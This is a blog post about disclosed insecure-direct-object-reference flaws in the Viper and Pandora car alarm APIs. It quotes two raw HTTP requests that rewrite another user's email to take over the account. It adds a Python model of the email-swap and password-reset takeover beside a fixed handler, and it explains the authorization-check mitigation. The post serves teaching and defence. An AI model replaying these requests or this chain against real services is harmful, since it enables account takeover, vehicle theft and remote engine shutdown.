3rd party car alarms make vehicles susceptible to theft

By Alfred Vergara on March 12, 2019

On March 8, 2019, security researchers at Pen Test Partners disclosed vulnerabilities in the application programming interfaces (APIs) of the Viper and Pandora 3rd party car alarm systems. The vulnerabilities, present in both systems, allowed an attacker to:

  • Locate vehicles in real time
  • Identify types of cars
  • Disable the alarm
  • Unlock the car
  • Engage the car’s immobilizer
  • Kill the engine

3rd Party Car Alarms

3rd party car alarms are sold as an added layer of security for keyless entry vehicles, i.e. vehicles that are unlocked and started without a physical key. The vendors market themselves as a fix for the insecure keyless entry systems that ship with these vehicles. Viper and Pandora, the two systems studied, have a combined installed base of about 3 million vehicles.

Pandora had marketed its system as unhackable, a claim Pen Test Partners quoted in their write-up.

The Vulnerability

Both Pandora and Viper had the same class of vulnerability in their APIs: an insecure direct object reference (IDOR). In an IDOR, the server acts on an object identified by a client-supplied value (here, a user ID) without verifying that the authenticated user is actually authorized to access that object. Because of this, a malicious user logged in to their own account could submit an update request that changes the email address (and, in Viper's case, the password) on another user's account. This lets the attacker lock the legitimate owner out of the account and take it over. For the Viper system, the /users/Update/xxxxx request is accepted for any user ID without an authorization check.

Here is a sample of the Viper Smart Start alarm update user request:

POST /users/Update/xxxxx HTTP/1.1
Host: colt.calamp-ts.com
Connection: close
Content-Length: 342
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://colt.calamp-ts.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://colt.calamp-ts.com/dashboard/home
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: __utma=36020146.382676338.1549803856.1549803856.1549803856.1; __utmc=36020146; __utmz=36020146.1549803856.1.1.utmcsr=medium.com|utmccn=(referral)|utmcmd=referral|utmcct=/@evstykas/remote-smart-car-hacking-with-just-a-phone-2fe7ca682162; kohanasession=flrd2pb6lcqohnu3ld79p9oif7; __utmt=1; __utmb=36020146.8.10.1549803856

FirstName=f&LastName=l&Email=egw2%40mailinator.com&Phone=123+132-1321&UserName=egw2%40mailinator.com&Password=!Password1&Language=English&Measurement=Imperial&Timezone=Etc%2FGMT%2B8&Pincode=0&Question=What%2Btown%2Bwere%2Byou%2Bborn%2Bin%253F&Answer=no&MsgFlag=0&DaylightSavings=0&CustomAttributes=%5B%5D&SessionId=flrd2pb6lcqohnu3ld79p9oif7

Viper update user request, as given by Pen Test Partners.

Pandora's API had a similar flaw that allowed the email address on an arbitrary account to be changed:

POST /api/sputnik/workers?id=xxxxx HTTP/1.1
Host: pro.p-on.ru
Connection: close
Content-Length: 167
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://pro.p-on.ru
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json
Referer: https://pro.p-on.ru/workers/185000
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: lang=en; sid=4020f4ba21edb3082902e227937995d6

{"id":xxxxx,"name_f":"name","name_i":"name_i","name_o":"name_o","groups":[],"email":"newemail","type":"user","company_perms":0}

Pandora alarms update email request, as given by Pen Test Partners.

After changing the email address on the target account, the attacker requests a password reset, which is delivered to the attacker-controlled address, and so gains control of the account.

With control of a Viper or Pandora account, the attacker can use every feature of the associated web application for that vehicle: locating the vehicle, killing its engine, unlocking it, and starting it.
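To make the flaw concrete, here is an added example, not code from Pen Test Partners or from either vendor: a minimal in-memory Python model of a user-update API that has the IDOR described above, the same handler with the missing authorization check added, and the email-swap-then-password-reset takeover chain run against both. All names, user IDs, email addresses, session and token formats are invented for illustration and do not correspond to the real Viper or Pandora APIs.

```python
# Added example, not vendor or Pen Test Partners code. Users, emails, IDs,
# sessions and tokens below are all made up for illustration.
import secrets
from dataclasses import dataclass, field


@dataclass
class User:
    user_id: int
    email: str
    password: str


@dataclass
class Service:
    users: dict = field(default_factory=dict)     # user_id -> User
    sessions: dict = field(default_factory=dict)  # session_id -> user_id
    outbox: dict = field(default_factory=dict)    # email -> (user_id, reset token); stands in for mail delivery

    def login(self, email, password):
        for u in self.users.values():
            if u.email == email and u.password == password:
                sid = secrets.token_hex(16)
                self.sessions[sid] = u.user_id
                return sid
        return None

    # Vulnerable handler, modelled on POST /users/Update/<id>: the session proves
    # the caller is *some* logged-in user, but the target id comes from the URL
    # and is never compared with the session's own user id (the IDOR).
    def update_user_vulnerable(self, session_id, target_id, **fields):
        if session_id not in self.sessions:
            return 401
        user = self.users.get(target_id)
        if user is None:
            return 404
        for k, v in fields.items():
            setattr(user, k, v)
        return 200

    # Fixed handler: identical, plus the object-level authorization check.
    def update_user_fixed(self, session_id, target_id, **fields):
        caller = self.sessions.get(session_id)
        if caller is None:
            return 401
        if caller != target_id:  # a caller may only edit its own record
            return 403
        user = self.users[target_id]  # exists: sessions only map to real users
        for k, v in fields.items():
            setattr(user, k, v)
        return 200

    # The reset token goes to whatever address is on the account, which is
    # exactly why swapping the email is enough for a full takeover.
    def request_password_reset(self, email):
        for u in self.users.values():
            if u.email == email:
                self.outbox[email] = (u.user_id, secrets.token_urlsafe(16))
                return True
        return False

    def complete_password_reset(self, email, token, new_password):
        entry = self.outbox.get(email)
        if entry is None or entry[1] != token:
            return False
        self.users[entry[0]].password = new_password
        del self.outbox[email]
        return True


def takeover_demo(fixed):
    """Run the attacker's chain against the vulnerable or the fixed endpoint.

    Returns (status of the update request, attacker's session on the victim's
    account or None).
    """
    svc = Service()
    svc.users[1001] = User(1001, "owner@example.com", "OwnerPw1")     # victim (made up)
    svc.users[2002] = User(2002, "attacker@example.com", "AttkrPw1")  # attacker (made up)

    sid = svc.login("attacker@example.com", "AttkrPw1")  # attacker's own legitimate session
    update = svc.update_user_fixed if fixed else svc.update_user_vulnerable

    # Step 1: point the victim's account at an address the attacker controls.
    status = update(sid, 1001, email="attacker-inbox@example.com")
    if status != 200:
        return status, None

    # Step 2: request a reset; the token lands in the attacker's inbox.
    svc.request_password_reset("attacker-inbox@example.com")
    _, token = svc.outbox["attacker-inbox@example.com"]
    svc.complete_password_reset("attacker-inbox@example.com", token, "Pwned1!")

    # Step 3: log in to the victim's account, now fully under attacker control.
    return status, svc.login("attacker-inbox@example.com", "Pwned1!")


if __name__ == "__main__":
    print(takeover_demo(fixed=False))  # status 200 and a live session on the victim's account
    print(takeover_demo(fixed=True))   # (403, None): the update is refused, chain stops
```

The only difference between the two handlers is the single comparison of the session's user id with the id in the request; everything else, including authentication, is the same, which is why an IDOR survives ordinary login testing and has to be checked by sending one user's session against another user's object.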

Impact

Pen Test Partners estimate that 3 million cars were affected by the vulnerabilities in the Viper and Pandora systems combined. From the time the flawed APIs were deployed until they were patched, an attacker could therefore compromise accounts, locate desirable vehicles, and steal them. There is also a safety concern, since the engine could be killed remotely. That capability is intended for use when a car is being stolen, but it could equally be used maliciously to cause a traffic accident.

The Internet of Things (IoT) refers to connecting tools, vehicles, and appliances to the Internet so that a user can conveniently manage them remotely. Viper and Pandora's car alarms are IoT devices by this definition. The issue with IoT is that the Internet becomes an attack vector against the device whenever its back-end service lacks proper authentication and authorization, as the Viper and Pandora systems show.

IoT is not the only consideration when purchasing vehicles or devices: keyless entry vehicles such as Tesla's have been susceptible to attacks on the radio link between the vehicle and its key fob that let an attacker clone the fob, then unlock and steal the vehicle. https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/

Mitigations

Both Viper and Pandora have updated their code to patch the IDOR vulnerabilities, and it is no longer possible to compromise user accounts in this way. The underlying fix is an authorization check performed server-side on every request: the authenticated user must be entitled to the object named in the request, and an identifier being hard to guess is not a substitute for that check. Beyond that, consider as a consumer whether IoT is necessary for your lifestyle or business operations. Consider the implications if the device is accessed by someone other than the intended user, and perhaps opt out of keyless entry systems.

Sources

https://www.pentestpartners.com/security-blog/gone-in-six-seconds-exploiting-car-alarms/

https://www.securityweek.com/flaws-smart-alarms-exposed-millions-cars-dangerous-hacking-0

https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

https://www.businessinsider.com/internet-of-things-definition